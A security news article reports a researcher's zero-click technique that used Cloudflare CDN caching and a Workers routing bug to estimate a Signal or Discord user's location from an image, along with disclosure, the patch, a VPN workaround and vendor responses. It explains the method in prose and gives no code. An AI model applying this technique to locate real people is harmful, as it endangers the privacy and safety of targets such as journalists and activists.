Cloudflare CDN Flaw Enables Zero-Click Geo-Location Attack via Signal, Discord
A newly discovered flaw in Cloudflare’s content delivery network (CDN) could allow attackers to approximate a target’s location within 50-300 miles by sending them an image on platforms like Signal and Discord. This zero-click attack raises serious privacy concerns for journalists, activists, and other privacy-conscious individuals.
How the Flaw Works
Security researcher Daniel uncovered that Cloudflare caches media resources at the data center nearest to the user to improve load times. By exploiting a bug in Cloudflare Workers, Daniel was able to route requests through specific data centers using a tool he called Cloudflare Teleport.
This method allowed the attacker to enumerate cached responses from different data centers. By analyzing which data center responded, the attacker could deduce the victim’s approximate location based on nearby airport codes.
Stealthy Zero-Click Tracking Explained
Three months ago, a security researcher named Daniel discovered a vulnerability in how Cloudflare’s content delivery network (CDN) handles media requests. Cloudflare’s CDN improves website performance by caching media files (such as images) at the data center closest to the user. This optimization inadvertently created a method for tracking a target’s approximate location without their knowledge or interaction.
How the Zero-Click Deanonymization Works
Sending a Malicious Image:
The attack starts with the attacker sending a target a message containing an image hosted on Cloudflare’s CDN. This could be a seemingly innocuous file, such as a screenshot or a profile picture.Exploiting Cloudflare Workers:
Using a custom-built tool called Cloudflare Teleport, the researcher exploited a bug in Cloudflare Workers—a feature that allows developers to customize CDN behavior. The bug enabled the attacker to arbitrarily route requests through specific Cloudflare data centers, overriding the usual restriction that routes requests through the closest data center to the user.Mapping the Target’s Location:
By enumerating the cached responses from multiple data centers, the attacker could identify which data center returned the requested image. Each data center corresponds to a nearby airport code, allowing the attacker to deduce the target’s general location within a radius of 50 to 300 miles.
Calculating response times
Source: hackermondev | GitHub
See Also: So, you want to be a hacker?
Offensive Security, Bug Bounty Courses
Discover your weakest link. Be proactive, not reactive. Cybercriminals need just one flaw to strike.
Why It’s a Zero-Click Attack
This method doesn’t require the target to interact with the malicious image or message. Applications like Signal and Discord automatically download images for push notifications, enabling the attacker to execute the attack without the target opening the message.
Accuracy and Precision
- The tracking precision depends on the density of Cloudflare data centers in the region.
- In urban areas with multiple nearby data centers, the accuracy improves significantly.
- In rural or less populated regions, the accuracy is broader, typically spanning a radius of 250–300 miles.
Locating the target
Source: hackermondev | GitHub
Experimenting with Discord’s CTO
While testing the attack, Daniel attempted to locate Discord’s CTO, Stanislav Vishnevskiy. He found that anycast routing (a load-balancing feature where multiple nearby data centers handle requests) slightly improved location accuracy around major cities.
Trending: Offensive Security Tool: ACEshark
Cloudflare’s Response
Daniel disclosed the vulnerability to Cloudflare, Signal, and Discord. Cloudflare resolved the issue in December 2024, patching the Workers bug and awarding the researcher a $200 bounty.
In a statement to BleepingComputer, a Cloudflare spokesperson said:
“This was first disclosed in December 2024 through our bug bounty program, investigated and immediately resolved… We continue to encourage third parties and researchers to report this type of activity for review by our team.”
Ongoing Feasibility
Despite the patch, Daniel found the attack still partially viable by using a VPN to simulate routing through different data centers. This approach covers approximately 54% of Cloudflare’s global data centers, although it is now more cumbersome to execute.
Signal and Discord Responses
- Signal: Dismissed the report as outside their mission’s scope to implement network-layer anonymity.
- Discord: Rejected the report, attributing the issue to Cloudflare.
Mitigation
To prevent similar attacks, Cloudflare users are advised to disable caching where necessary. Meanwhile, the incident underscores the risks posed by CDN-based caching in privacy-sensitive applications.
Are u a security researcher? Or a company that writes articles about Cyber Security, Offensive Security (related to information security in general) that match with our specific audience and is worth sharing? If you want to express your idea in an article contact us here for a quote: [email protected]
Source: bleepingcomputer.com
Recent News
HPE Investigates Claims of Data Breach and Source Code Disclosure by Hackers
Malicious npm and PyPI Packages Steal Solana Private Keys and Delete Sensitive Data
Severe Vulnerability in W3 Total Cache Plugin Exposes Over a Million WordPress Sites to Attacks
FortiGate Leak: Over 15,000 Devices’ Configs and VPN Credentials Exposed by New Hacking Group
Offensive Security & Ethical Hacking Course
Begin the learning curve of hacking now!
Information Security Solutions
Find out how Pentesting Services can help you.
